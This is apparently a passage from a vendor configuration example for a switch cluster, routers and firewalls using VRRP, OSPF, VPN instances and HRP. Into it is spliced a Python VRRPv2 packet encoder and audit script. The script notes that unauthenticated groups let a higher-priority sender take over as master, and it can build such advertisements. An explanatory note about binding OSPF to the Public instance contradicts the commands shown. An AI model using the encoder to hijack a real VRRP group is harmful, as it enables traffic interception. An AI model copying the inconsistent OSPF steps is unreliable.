[CSS] interface Eth-Trunk 6
[CSS-Eth-Trunk6] quit
[CSS] interface Gigabitethernet 1/2/0/7 //Add an interface on the master
switch to Eth-Trunk6.
[CSS-Gigabitethernet1/2/0/7] Eth-Trunk 6
[CSS-Gigabitethernet1/2/0/7] quit
[CSS] interface Gigabitethernet 2/2/0/7 //Add an interface on the backup
switch to Eth-Trunk6.
[CSS-Gigabitethernet2/2/0/7] Eth-Trunk 6
[CSS-Gigabitethernet2/2/0/7] quit

# In the CSS, create Eth-Trunk7 to connect VRF-A to FW2 and add member interfaces
to Eth-Trunk7.
[CSS] interface Eth-Trunk 7
[CSS-Eth-Trunk7] quit
[CSS] interface Gigabitethernet 1/2/0/8 //Add an interface on the master
switch to Eth-Trunk7.
[CSS-Gigabitethernet1/2/0/8] Eth-Trunk 7
[CSS-Gigabitethernet1/2/0/8] quit
[CSS] interface Gigabitethernet 2/2/0/8 //Add an interface on the backup
switch to Eth-Trunk7.
[CSS-Gigabitethernet2/2/0/8] Eth-Trunk 7
[CSS-Gigabitethernet2/2/0/8] quit

# Create VLANIF interfaces and assign IP addresses to them.
[CSS] vlan batch 20 30
[CSS] interface Eth-Trunk 4 //Add Eth-Trunk4 to VLAN 20.
[CSS-Eth-Trunk4] port link-type trunk
[CSS-Eth-Trunk4] port trunk allow-pass vlan 20
[CSS-Eth-Trunk4] quit
[CSS] interface Eth-Trunk 6 //Add Eth-Trunk6 to VLAN 20.
[CSS-Eth-Trunk6] port link-type trunk
[CSS-Eth-Trunk6] port trunk allow-pass vlan 20
[CSS-Eth-Trunk6] quit
[CSS] interface Vlanif 20 //Create VLANIF 20 for Public to connect to FW1
and FW2.
[CSS-Vlanif20] ip address 10.10.2.1 24
[CSS-Vlanif20] quit
[CSS] interface Eth-Trunk 5 //Add Eth-Trunk5 to VLAN 30.
[CSS-Eth-Trunk5] port link-type trunk
[CSS-Eth-Trunk5] port trunk allow-pass vlan 30
[CSS-Eth-Trunk5] quit
[CSS] interface Eth-Trunk 7 //Add Eth-Trunk7 to VLAN 30.
[CSS-Eth-Trunk7] port link-type trunk
[CSS-Eth-Trunk7] port trunk allow-pass vlan 30
[CSS-Eth-Trunk7] quit
[CSS] interface Vlanif 30 //Create VLANIF 30 for VRF-A to connect to FW1
and FW2.
[CSS-Vlanif30] ip address 10.10.3.1 24
[CSS-Vlanif30] quit


3. Configure inter-chassis Eth-Trunks between the CSS and the service networks. Configure
VLANIF interfaces and assign IP addresses to them.
# In the CSS, create Eth-Trunk8 to connect to service network 1 and add member
interfaces to Eth-Trunk8.
[CSS] interface Eth-Trunk 8
[CSS-Eth-Trunk8] quit
[CSS] interface Gigabitethernet 1/3/0/1 //Add an interface on the master
switch to Eth-Trunk8.
[CSS-Gigabitethernet1/3/0/1] Eth-Trunk 8
[CSS-Gigabitethernet1/3/0/1] quit
[CSS] interface Gigabitethernet 2/3/0/1 //Add an interface on the backup
switch to Eth-Trunk8.
[CSS-Gigabitethernet2/3/0/1] Eth-Trunk 8
[CSS-Gigabitethernet2/3/0/1] quit

# In the CSS, create Eth-Trunk9 to connect to service network 2 and add member
interfaces to Eth-Trunk9.
[CSS] interface Eth-Trunk 9
[CSS-Eth-Trunk9] quit
[CSS] interface Gigabitethernet 1/3/0/2 //Add an interface on the master
switch to Eth-Trunk9.
[CSS-Gigabitethernet1/3/0/2] Eth-Trunk 9
[CSS-Gigabitethernet1/3/0/2] quit
[CSS] interface Gigabitethernet 2/3/0/2 //Add an interface on the backup
switch to Eth-Trunk9.
[CSS-Gigabitethernet2/3/0/2] Eth-Trunk 9
[CSS-Gigabitethernet2/3/0/2] quit

# Create VLANIF interfaces and assign IP addresses to them.
[CSS] vlan batch 100 200
[CSS] interface Eth-Trunk 8 //Add Eth-Trunk8 to VLAN 100.
[CSS-Eth-Trunk8] port link-type trunk
[CSS-Eth-Trunk8] port trunk allow-pass vlan 100
[CSS-Eth-Trunk8] quit
[CSS] interface Vlanif 100 //Create VLANIF 100 for CSS to connect to
service network 1.
[CSS-Vlanif100] ip address 10.10.100.1 24
[CSS-Vlanif100] quit
[CSS] interface Eth-Trunk 9 //Add Eth-Trunk9 to VLAN 200.
[CSS-Eth-Trunk9] port link-type trunk
[CSS-Eth-Trunk9] port trunk allow-pass vlan 200
[CSS-Eth-Trunk9] quit
[CSS] interface Vlanif 200 //Create VLANIF 200 for CSS to connect to
service network 2.
[CSS-Vlanif200] ip address 10.10.200.1 24
[CSS-Vlanif200] quit

Step 3 On routers: Configure the interfaces between the routers and the CSS.
# Configure Router1, create Eth-Trunk1 on Router1, and add member interfaces to Eth-
Trunk1.
<Huawei> system-view
[Huawei] sysname Router1
[Router1] interface Eth-Trunk 1
[Router1-Eth-Trunk1] quit
[Router1] interface XGigabitethernet 1/0/1
[Router1-XGigabitEthernet1/0/1] undo shutdown
[Router1-XGigabitEthernet1/0/1] Eth-Trunk 1
[Router1-XGigabitEthernet1/0/1] quit
[Router1] interface XGigabitethernet 1/0/2
[Router1-XGigabitEthernet1/0/2] undo shutdown
[Router1-XGigabitEthernet1/0/2] Eth-Trunk 1
[Router1-XGigabitEthernet1/0/2] quit


# Configure the Dot1q termination subinterface for VLAN 10 and assign an IP address to the
subinterface.
[Router1] interface Eth-Trunk 1.100
[Router1-Eth-Trunk1.100] ip address 10.10.4.2 24
[Router1-Eth-Trunk1.100] dot1q termination vid 10
[Router1-Eth-Trunk1.100] quit

# The configuration procedure on Router2 is the same as that on Router1, except that
Eth-Trunk1.100 on Router2 uses the IP address 10.10.4.3/24 (see the Router2 configuration file).
Step 4 On firewalls: Configure interfaces and zones.
# Configure interfaces and zones on FW1.
<USG> system-view
[USG] sysname FW1
[FW1] interface Eth-Trunk 4 //Configure the interface connected to CSS and
assign an IP address to it.
[FW1-Eth-Trunk4] ip address 10.10.2.2 24
[FW1-Eth-Trunk4] quit
[FW1] interface Gigabitethernet 1/0/0 //Add an interface to Eth-Trunk4.
[FW1-GigabitEthernet1/0/0] Eth-Trunk 4
[FW1-GigabitEthernet1/0/0] quit
[FW1] interface Gigabitethernet 1/0/1 //Add an interface to Eth-Trunk4.
[FW1-GigabitEthernet1/0/1] Eth-Trunk 4
[FW1-GigabitEthernet1/0/1] quit

[FW1] interface Eth-Trunk 5 //Configure the interface connected to CSS and
assign an IP address to it.
[FW1-Eth-Trunk5] ip address 10.10.3.2 24
[FW1-Eth-Trunk5] quit
[FW1] interface Gigabitethernet 1/1/0 //Add an interface to Eth-Trunk5.
[FW1-GigabitEthernet1/1/0] Eth-Trunk 5
[FW1-GigabitEthernet1/1/0] quit
[FW1] interface Gigabitethernet 1/1/1 //Add an interface to Eth-Trunk5.
[FW1-GigabitEthernet1/1/1] Eth-Trunk 5
[FW1-GigabitEthernet1/1/1] quit

[FW1] interface Eth-Trunk 1 //Configure the interface connecting FW1 to FW2.
[FW1-Eth-Trunk1] ip address 10.1.1.1 24
[FW1-Eth-Trunk1] quit
[FW1] interface Gigabitethernet 2/0/0 //Add an interface to Eth-Trunk1.
[FW1-GigabitEthernet2/0/0] Eth-Trunk 1
[FW1-GigabitEthernet2/0/0] quit
[FW1] interface Gigabitethernet 2/0/1 //Add an interface to Eth-Trunk1.
[FW1-GigabitEthernet2/0/1] Eth-Trunk 1
[FW1-GigabitEthernet2/0/1] quit

[FW1] firewall zone trust
[FW1-zone-trust] add interface Eth-Trunk 5 //Add Eth-Trunk5, which connects to the
intranet, to the Trust zone.
[FW1-zone-trust] quit
[FW1] firewall zone untrust
[FW1-zone-untrust] add interface Eth-Trunk 4 //Add Eth-Trunk4, which connects to the
extranet, to the Untrust zone.
[FW1-zone-untrust] quit
[FW1] firewall zone dmz
[FW1-zone-dmz] add interface Eth-Trunk 1 //Add the interface between FW1 and
FW2 to the DMZ.
[FW1-zone-dmz] quit

# Configure interfaces and zones on FW2.
<USG> system-view
[USG] sysname FW2
[FW2] interface Eth-Trunk 6 //Configure the interface connected to CSS and
assign an IP address to it.
[FW2-Eth-Trunk6] ip address 10.10.2.3 24


[FW2-Eth-Trunk6] quit
[FW2] interface Gigabitethernet 1/0/0 //Add an interface to Eth-Trunk6.
[FW2-GigabitEthernet1/0/0] Eth-Trunk 6
[FW2-GigabitEthernet1/0/0] quit
[FW2] interface Gigabitethernet 1/0/1 //Add an interface to Eth-Trunk6.
[FW2-GigabitEthernet1/0/1] Eth-Trunk 6
[FW2-GigabitEthernet1/0/1] quit

[FW2] interface Eth-Trunk 7 //Configure the interface connected to CSS and
assign an IP address to it.
[FW2-Eth-Trunk7] ip address 10.10.3.3 24
[FW2-Eth-Trunk7] quit
[FW2] interface Gigabitethernet 1/1/0 //Add an interface to Eth-Trunk7.
[FW2-GigabitEthernet1/1/0] Eth-Trunk 7
[FW2-GigabitEthernet1/1/0] quit
[FW2] interface Gigabitethernet 1/1/1 //Add an interface to Eth-Trunk7.
[FW2-GigabitEthernet1/1/1] Eth-Trunk 7
[FW2-GigabitEthernet1/1/1] quit

[FW2] interface Eth-Trunk 1 //Configure the interface between FW2 and FW1.
[FW2-Eth-Trunk1] ip address 10.1.1.2 24
[FW2-Eth-Trunk1] quit
[FW2] interface Gigabitethernet 2/0/0 //Add an interface to Eth-Trunk1.
[FW2-GigabitEthernet2/0/0] Eth-Trunk 1
[FW2-GigabitEthernet2/0/0] quit
[FW2] interface Gigabitethernet 2/0/1 //Add an interface to Eth-Trunk1.
[FW2-GigabitEthernet2/0/1] Eth-Trunk 1
[FW2-GigabitEthernet2/0/1] quit

[FW2] firewall zone trust
[FW2-zone-trust] add interface Eth-Trunk 7 //Add Eth-Trunk7 connected to the
intranet to the trusted zone.
[FW2-zone-trust] quit
[FW2] firewall zone untrust
[FW2-zone-untrust] add interface Eth-Trunk 6 //Add Eth-Trunk6 connected to the
extranet to the untrusted zone.
[FW2-zone-untrust] quit
[FW2] firewall zone dmz
[FW2-zone-dmz] add interface Eth-Trunk 1 //Add the interface between FW1 and
FW2 to the DMZ.
[FW2-zone-dmz] quit

Step 5 On routers: Configure VRRP. Configure Router1 as the VRRP master and Router2 as the
VRRP backup.
# Configure Router1.
[Router1] interface Eth-Trunk 1.100
[Router1-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.4.100 //Configure the
VRRP virtual IP address.
[Router1-Eth-Trunk1.100] vrrp vrid 1 priority 120 //Increase the priority of
Router1 to make Router1 become the Master.
[Router1-Eth-Trunk1.100] quit

# Configure Router2.
[Router2] interface Eth-Trunk 1.100
[Router2-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.4.100 //Configure the
VRRP virtual IP address.
[Router2-Eth-Trunk1.100] quit

After the configuration is complete, a VRRP group should have been set up between Router1
and Router2. You can run the display vrrp command to view the VRRP status of Router1 and
Router2.
# Check the VRRP status of Router1. The status is master.
[Router1] display vrrp
Eth-Trunk1.100 | Virtual Router 1


State : Master
Virtual IP : 10.10.4.100
Master IP : 10.10.4.2
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Create time : 2015-05-18 06:53:47 UTC-05:13
Last change time : 2015-05-18 06:54:14 UTC-05:13

# Check the VRRP status of Router2. The status is backup.
[Router2] display vrrp
Eth-Trunk1.100 | Virtual Router 1
State : Backup
Virtual IP : 10.10.4.100
Master IP : 10.10.4.2
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Create time : 2015-05-18 06:53:52 UTC-05:13
Last change time : 2015-05-18 06:57:12 UTC-05:13
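
The two display vrrp outputs above describe the VRRPv2 advertisement that Router1 sends on VLAN 10 once per second: VRID 1, priority 120, virtual IP 10.10.4.100, Auth type NONE, and the virtual MAC 0000-5e00-0101 that the IANA block 00-00-5E-00-01-{VRID} yields. The following Python is an added example and is not part of this Huawei document or of VRP. It encodes and decodes such an advertisement according to RFC 3768, verifies the checksum when decoding, derives the virtual MAC in the form VRP displays, and reports the findings an operator would want for an advertisement seen on that segment: a VRID or virtual IP other than the configured one, a priority above the configured master's (with Preempt YES such a sender becomes master), and an authentication type of NONE. The packet bytes are constructed in the block; the expected values passed to audit() are those of this example's configuration.

```python
"""VRRPv2 advertisement codec and audit (added example, not part of this document or of VRP)."""
import ipaddress
import struct
from dataclasses import dataclass
from typing import List

VRRP_VERSION, VRRP_ADVERTISEMENT, AUTH_NONE = 2, 1, 0


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum over the VRRP message; a valid message sums to zero."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


@dataclass
class Advertisement:
    vrid: int
    priority: int
    adver_int: int          # advertisement interval in seconds ("TimerRun : 1 s")
    auth_type: int          # 0 = NONE, as in the display vrrp output
    addresses: List[str]

    def virtual_mac(self) -> str:
        """IANA block 00-00-5E-00-01-{VRID}, in the H-H-H form VRP displays."""
        return "0000-5e00-01%02x" % self.vrid

    def to_bytes(self) -> bytes:
        header = struct.pack("!BBBBBBH", (VRRP_VERSION << 4) | VRRP_ADVERTISEMENT,
                             self.vrid, self.priority, len(self.addresses),
                             self.auth_type, self.adver_int, 0)      # checksum filled in below
        body = b"".join(ipaddress.IPv4Address(a).packed for a in self.addresses)
        body += bytes(8)                                              # VRRPv2 auth data, unused
        return header[:6] + struct.pack("!H", ones_complement_sum(header + body)) + body

    @classmethod
    def from_bytes(cls, pkt: bytes) -> "Advertisement":
        if len(pkt) < 16:
            raise ValueError("too short for a VRRPv2 message")
        ver_type, vrid, prio, count, auth, adver, _ = struct.unpack("!BBBBBBH", pkt[:8])
        if ver_type >> 4 != VRRP_VERSION or ver_type & 0x0F != VRRP_ADVERTISEMENT:
            raise ValueError("not a VRRPv2 advertisement")
        length = 8 + 4 * count + 8
        if len(pkt) < length:
            raise ValueError("address count exceeds packet length")
        if ones_complement_sum(pkt[:length]) != 0:
            raise ValueError("bad checksum")
        addrs = [str(ipaddress.IPv4Address(pkt[8 + 4 * i:12 + 4 * i])) for i in range(count)]
        return cls(vrid, prio, adver, auth, addrs)


def is_valid(pkt: bytes) -> bool:
    """True if pkt decodes as a well-formed VRRPv2 advertisement with a correct checksum."""
    try:
        Advertisement.from_bytes(pkt)
        return True
    except ValueError:
        return False


def audit(adv: Advertisement, expected_vrid: int, expected_vip: str, master_priority: int) -> List[str]:
    """Findings for an advertisement seen on a segment where exactly one group is expected."""
    findings = []
    if adv.vrid != expected_vrid:
        findings.append(f"unexpected VRID {adv.vrid} on this segment")
    elif adv.addresses != [expected_vip]:
        findings.append(f"VRID {adv.vrid} advertises {adv.addresses}, expected [{expected_vip!r}]")
    if adv.priority > master_priority:
        findings.append(f"priority {adv.priority} exceeds the configured master's {master_priority}; "
                        "with preemption enabled this sender becomes master")
    if adv.auth_type == AUTH_NONE:
        findings.append("authentication type NONE: advertisements are not authenticated")
    return findings


if __name__ == "__main__":
    # Router1's VRID 1 advertisement as described by the display vrrp output (constructed bytes)
    router1 = Advertisement(vrid=1, priority=120, adver_int=1, auth_type=AUTH_NONE,
                            addresses=["10.10.4.100"])
    wire = router1.to_bytes()
    decoded = Advertisement.from_bytes(wire)
    print(wire.hex(), decoded.virtual_mac(), audit(decoded, 1, "10.10.4.100", 120))
```

The same code applies to the firewalls' VRID 1 and VRID 2 groups on VLAN 20 and VLAN 30 (virtual MACs 0000-5e00-0101 and 0000-5e00-0102 in the display vrrp output of Step 7). Since every group in this example runs with Auth type NONE and Preempt YES, a check of this kind on the three VLANs is the only way to notice a device that starts advertising with a higher priority.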

Step 6 Configure routes between CSS and FWs and between CSS and routers.
1. Configure OSPF between switches and routers.
# Create VPN instance Public on CSS and bind the interfaces connected to routers and
firewalls to Public.
[CSS] ip vpn-instance Public //Create the VPN instance Public.
[CSS-vpn-instance-Public] ipv4-family
[CSS-vpn-instance-Public-af-ipv4] route-distinguisher 100:2
[CSS-vpn-instance-Public-af-ipv4] vpn-target 222:2 both
[CSS-vpn-instance-Public-af-ipv4] quit
[CSS-vpn-instance-Public] quit
[CSS] interface Vlanif 10
[CSS-Vlanif10] ip binding vpn-instance Public //Bind VLANIF 10, which
connects the CSS to router, to Public.
[CSS-Vlanif10] ip address 10.10.4.1 24 //Reconfigure an IP address for
VLANIF 10, because the preceding operation has deleted the original IP
address.
[CSS-Vlanif10] quit
[CSS] interface Vlanif 20
[CSS-Vlanif20] ip binding vpn-instance Public //Bind VLANIF 20, which
connects the CSS to firewall's upstream interface, to Public.
[CSS-Vlanif20] ip address 10.10.2.1 24 //Reconfigure an IP address for
VLANIF 20, because the preceding operation has deleted the original IP
address.
[CSS-Vlanif20] quit

# Configure a static route in Public to forward upstream traffic. Set the next hop of the
route to the VRRP virtual IP address of routers.
[CSS] ip route-static vpn-instance Public 0.0.0.0 0.0.0.0 10.10.4.100 //
Configure a default route for Public and set the next hop as the VRRP virtual
IP address of the router.


# Configure OSPF between the CSS and the routers to forward downstream traffic. The routers
learn the return routes to the service networks through OSPF. Note that VLANIF 10 was bound to
the VPN instance Public in the previous step; an OSPF process runs only on interfaces in its own
VPN instance, so bind the process to Public (ospf 100 vpn-instance Public) for the adjacency on
VLANIF 10 to form. The network commands for 10.10.100.0 and 10.10.200.0 below cover VLANIF 100
and VLANIF 200, which are bound to VRF-A in the next substep; the routers receive those prefixes
through import-route static instead.
[CSS] ospf 100 router-id 1.1.1.1
[CSS-ospf-100] area 0
[CSS-ospf-100-area-0.0.0.0] network 10.10.100.0 0.0.0.255 //Advertise the
routes on the network segment of service network 1 to OSPF.
[CSS-ospf-100-area-0.0.0.0] network 10.10.200.0 0.0.0.255 //Advertise the
routes on the network segment of service network 2 to OSPF.
[CSS-ospf-100-area-0.0.0.0] network 10.10.4.0 0.0.0.255 //Advertise the
routes on the network segment connected to Router to OSPF.
[CSS-ospf-100-area-0.0.0.0] quit
[CSS-ospf-100] import-route static //Import the static route to OSPF.
[CSS-ospf-100] quit

Configure OSPF on Router1 and Router2.
# Configure Router1.
[Router1] ospf 100 router-id 2.2.2.2
[Router1-ospf-100] area 0
[Router1-ospf-100-area-0.0.0.0] network 10.10.4.0 0.0.0.255 //Advertise
the routes on the network segment connected to CSS to OSPF.
[Router1-ospf-100-area-0.0.0.0] quit
[Router1-ospf-100] quit

# Configure Router2.
[Router2] ospf 100 router-id 3.3.3.3
[Router2-ospf-100] area 0
[Router2-ospf-100-area-0.0.0.0] network 10.10.4.0 0.0.0.255 //Advertise
the routes on the network segment connected to CSS to OSPF.
[Router2-ospf-100-area-0.0.0.0] quit
[Router2-ospf-100] quit

# After the configurations are complete, CSS, Router1, and Router2 can set up neighbor
relationships. For example, when you view OSPF neighbor information on the CSS, you
can find that Router1 and Router2 have set up OSPF neighbor relationships with CSS
and the neighbor status is Full.
[CSS] display ospf peer
OSPF Process 100 with Router ID 1.1.1.1
Neighbors

Area 0.0.0.0 interface 10.10.4.1(Vlanif10)'s neighbors

Router ID: 2.2.2.2 Address: 10.10.4.2
State: Full Mode:Nbr is Master Priority: 1
DR: 10.10.4.1 BDR: 10.10.4.2 MTU: 0
Dead timer due in 31 sec
Retrans timer interval: 5
Neighbor is up for 00:13:23
Authentication Sequence: [ 0 ]

Router ID: 3.3.3.3 Address: 10.10.4.3
State: Full Mode:Nbr is Master Priority: 1
DR: 10.10.4.1 BDR: 10.10.4.2 MTU: 0
Dead timer due in 37 sec
Retrans timer interval: 5
Neighbor is up for 00:00:52
Authentication Sequence: [ 0 ]

2. Configure static routes between the CSS and the FWs.
# Create VRF-A on the CSS to forward upstream traffic, and bind the interfaces
connected to the service networks and to the downstream interfaces of the firewalls to
VRF-A. The default route of VRF-A points to the downstream VRRP virtual IP address
(VRID 2) of the firewalls.


[CSS] ip vpn-instance VRF-A //Create VRF-A.
[CSS-vpn-instance-VRF-A] ipv4-family
[CSS-vpn-instance-VRF-A-af-ipv4] route-distinguisher 100:1
[CSS-vpn-instance-VRF-A-af-ipv4] vpn-target 111:1 both
[CSS-vpn-instance-VRF-A-af-ipv4] quit
[CSS-vpn-instance-VRF-A] quit
[CSS] interface Vlanif 100
[CSS-Vlanif100] ip binding vpn-instance VRF-A //Bind VLANIF 100, which
connects the CSS to service network 1, to VRF-A.
[CSS-Vlanif100] ip address 10.10.100.1 24 //Reconfigure an IP address for
VLANIF 100, because the preceding operation has deleted the original IP
address.
[CSS-Vlanif100] quit
[CSS] interface Vlanif 200
[CSS-Vlanif200] ip binding vpn-instance VRF-A //Bind VLANIF 200, which
connects the CSS to service network 2, to VRF-A.
[CSS-Vlanif200] ip address 10.10.200.1 24 //Reconfigure an IP address for
VLANIF 200, because the preceding operation has deleted the original IP
address.
[CSS-Vlanif200] quit
[CSS] interface Vlanif 30
[CSS-Vlanif30] ip binding vpn-instance VRF-A //Bind VLANIF 30, which
connects the CSS to the firewall's downstream interface, to VRF-A.
[CSS-Vlanif30] ip address 10.10.3.1 24 //Reconfigure an IP address for
VLANIF 30, because the preceding operation has deleted the original IP
address.
[CSS-Vlanif30] quit

# Configure a default route in VRF-A. The next hop is the downstream VRRP 2 virtual
IP address (VRID2) of firewalls.
[CSS] ip route-static vpn-instance VRF-A 0.0.0.0 0.0.0.0 10.10.3.5

# Configure static routes in Public to forward downstream traffic. Set the next hop of
the routes to the upstream VRRP 1 virtual IP address (VRID1) of the firewalls.
[CSS] ip route-static vpn-instance Public 10.10.100.0 255.255.255.0
10.10.2.5 //The destination address is on service network 1 and the next
hop is the VRID1 virtual IP address of the two FWs.
[CSS] ip route-static vpn-instance Public 10.10.200.0 255.255.255.0
10.10.2.5 //The destination address is on service network 2 and the next
hop is the VRID1 virtual IP address of the two FWs.

3. Configure static routes on firewalls.
# Configure a static route on FW1.
[FW1] ip route-static 0.0.0.0 0.0.0.0 10.10.2.1 //For upstream traffic, the
next hop of the default route is the IP address of VLANIF 20 on Public.
[FW1] ip route-static 10.10.100.0 255.255.255.0 10.10.3.1 //For downstream
traffic, the destination address is on service network 1 and the next hop is
the IP address of VLANIF 30 on VRF-A.
[FW1] ip route-static 10.10.200.0 255.255.255.0 10.10.3.1 //For downstream
traffic, the destination address is on service network 2 and the next hop is
the IP address of VLANIF 30 on VRF-A.

# Configure a static route on FW2.
[FW2] ip route-static 0.0.0.0 0.0.0.0 10.10.2.1 //For upstream traffic, the
next hop of the default route is the IP address of VLANIF 20 on Public.
[FW2] ip route-static 10.10.100.0 255.255.255.0 10.10.3.1 //For downstream
traffic, the destination address is on service network 1 and the next hop is
the IP address of VLANIF 30 on VRF-A.
[FW2] ip route-static 10.10.200.0 255.255.255.0 10.10.3.1 //For downstream
traffic, the destination address is on service network 2 and the next hop is
the IP address of VLANIF 30 on VRF-A.

# After the configuration is complete, the CSS has OSPF neighbor relationships with
Router1 and Router2. Run the display ospf peer command to view the OSPF neighbor status;
in the display on the CSS shown earlier in this step, the neighbor status of both routers is
Full.
4. Verify the configuration.

# Check the routing table on CSS.
[CSS] display ip routing-table vpn-instance VRF-A
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: VRF-A
Destinations : 7 Routes : 7

Destination/Mask Proto Pre Cost Flags NextHop Interface

0.0.0.0/0 Static 60 0 RD 10.10.3.5 Vlanif30
10.10.3.0/24 Direct 0 0 D 10.10.3.1 Vlanif30
10.10.3.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
10.10.100.0/24 Direct 0 0 D 10.10.100.1 Vlanif100
10.10.100.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.10.200.0/24 Direct 0 0 D 10.10.200.1 Vlanif200
10.10.200.1/32 Direct 0 0 D 127.0.0.1 Vlanif200

In the routing table on VRF-A, the first line indicates that the next hop for the traffic
destined for the Internet is the VRRP VRID 2 virtual IP address (10.10.3.5) of firewalls.
This indicates that upstream traffic is forcibly directed to firewalls for filtering.
[CSS] display ip routing-table vpn-instance Public
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 7 Routes : 7

Destination/Mask Proto Pre Cost Flags NextHop Interface

0.0.0.0/0 Static 60 0 RD 10.10.4.100 Vlanif10
10.10.2.0/24 Direct 0 0 D 10.10.2.1 Vlanif20
10.10.2.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
10.10.4.0/24 Direct 0 0 D 10.10.4.1 Vlanif10
10.10.4.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.10.100.0/24 Static 60 0 RD 10.10.2.5 Vlanif20
10.10.200.0/24 Static 60 0 RD 10.10.2.5 Vlanif20

In the routing table of Public, the first line indicates that the next hop for the traffic
destined for the Internet is the VRRP VRID 1 virtual IP address (10.10.4.100) of the routers.

The last two lines indicate that the next hop for the traffic destined for the service
networks is the VRRP VRID 1 virtual IP address (10.10.2.5) of the firewalls. This indicates
that downstream traffic is forcibly directed to the firewalls for filtering.

Step 7 Configure HRP on firewalls.

# Configure HRP on FW1 and set FW1 as master.
[FW1] interface Eth-Trunk 4
[FW1-Eth-Trunk4] vrrp vrid 1 virtual-ip 10.10.2.5 24 master //Configure VRRP
group 1 on the upstream interface and set its status to master.
[FW1-Eth-Trunk4] quit
[FW1] interface Eth-Trunk 5
[FW1-Eth-Trunk5] vrrp vrid 2 virtual-ip 10.10.3.5 24 master //Configure VRRP
group 2 on the downstream interface and set its status to master.
[FW1-Eth-Trunk5] quit
[FW1] hrp interface Eth-Trunk 1 remote 10.1.1.2 //Configure the heartbeat
interface and enable HRP.
[FW1] firewall packet-filter default permit interzone local dmz
[FW1] hrp enable
HRP_M[FW1]


# Configure HRP on FW2 and set FW2 as slave.
[FW2] interface Eth-Trunk 6
[FW2-Eth-Trunk6] vrrp vrid 1 virtual-ip 10.10.2.5 24 slave //Configure VRRP
group 1 on the upstream interface and set its status to slave.
[FW2-Eth-Trunk6] quit
[FW2] interface Eth-Trunk 7
[FW2-Eth-Trunk7] vrrp vrid 2 virtual-ip 10.10.3.5 24 slave //Configure VRRP
group 2 on the downstream interface and set its status to slave.
[FW2-Eth-Trunk7] quit
[FW2] hrp interface Eth-Trunk 1 remote 10.1.1.1 //Configure the heartbeat
interface and enable HRP.
[FW2] firewall packet-filter default permit interzone local dmz
[FW2] hrp enable
HRP_S[FW2]

# Check VRRP status. FW1 is the master and FW2 is the slave.
HRP_M[FW1] display vrrp
Eth-Trunk4 | Virtual Router 1
VRRP Group : Master
State : Master
Virtual IP : 10.10.2.5
Virtual MAC : 0000-5e00-0101
Primary IP : 10.10.2.2
PriorityRun : 120
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
Advertisement Timer : 1
Auth type : NONE
Check TTL : YES

Eth-Trunk5 | Virtual Router 2
VRRP Group : Master
State : Master
Virtual IP : 10.10.3.5
Virtual MAC : 0000-5e00-0102
Primary IP : 10.10.3.2
PriorityRun : 120
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
Advertisement Timer : 1
Auth type : NONE
Check TTL : YES
HRP_S[FW2] display vrrp
Eth-Trunk7 | Virtual Router 2
VRRP Group : Slave
State : Backup
Virtual IP : 10.10.3.5
Virtual MAC : 0000-5e00-0102
Primary IP : 10.10.3.3
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
Advertisement Timer : 1
Auth type : NONE
Check TTL : YES

Eth-Trunk6 | Virtual Router 1
VRRP Group : Slave
State : Backup
Virtual IP : 10.10.2.5
Virtual MAC : 0000-5e00-0101
Primary IP : 10.10.2.3
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120


Preempt : YES Delay Time : 0 s
Advertisement Timer : 1
Auth type : NONE
Check TTL : YES

# Check HRP status.
HRP_M[FW1] display hrp state
The firewall's config state is: MASTER

Current state of virtual routers configured as master:
Eth-Trunk4 vrid 1 : master
(gigabitEthernet1/0/0) : up
(gigabitEthernet1/0/1) : up
Eth-Trunk5 vrid 2 : master
(gigabitEthernet1/1/0) : up
(gigabitEthernet1/1/1) : up

NOTE
After HRP is configured, the configurations and sessions on the active firewall are synchronized to the
standby firewall; therefore, you only need to perform the following configurations on the active firewall
FW1.

Step 8 Configure security policies on firewalls.
This example covers only the connections between the firewalls and the switches and the
HRP configuration on the firewalls. For the security service plan on the firewalls (security
policies, attack defense, bandwidth management, and IPSec on the campus network), see
Firewall Configuration Examples.
Step 9 Verify the configuration.
After the configurations are complete, check whether the CSS and routers can ping each other.
# Ping Eth-Trunk1.100 of Router1 from the CSS to check the uplink connectivity. VLANIF 10 is
bound to the VPN instance Public, so the ping is sent from that instance.
<CSS> ping -vpn-instance Public 10.10.4.2
Ping 10.10.4.2: 32 data bytes, Press Ctrl_C to break
Reply From 10.10.4.2: bytes=32 seq=1 ttl=126 time=140 ms
Reply From 10.10.4.2: bytes=32 seq=2 ttl=126 time=235 ms
Reply From 10.10.4.2: bytes=32 seq=3 ttl=126 time=266 ms
Reply From 10.10.4.2: bytes=32 seq=4 ttl=126 time=140 ms
Reply From 10.10.4.2: bytes=32 seq=5 ttl=126 time=141 ms

--- 10.10.4.2 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 140/184/266 ms

You can find that the CSS and Router1 can ping each other.
# Ping VLANIF 100 (in VRF-A) on the CSS from Router1 to check the downlink connectivity.
The request is routed through Public to the firewalls and back into VRF-A, so the TTL of the
replies is decremented by two hops.
<Router1> ping 10.10.100.1
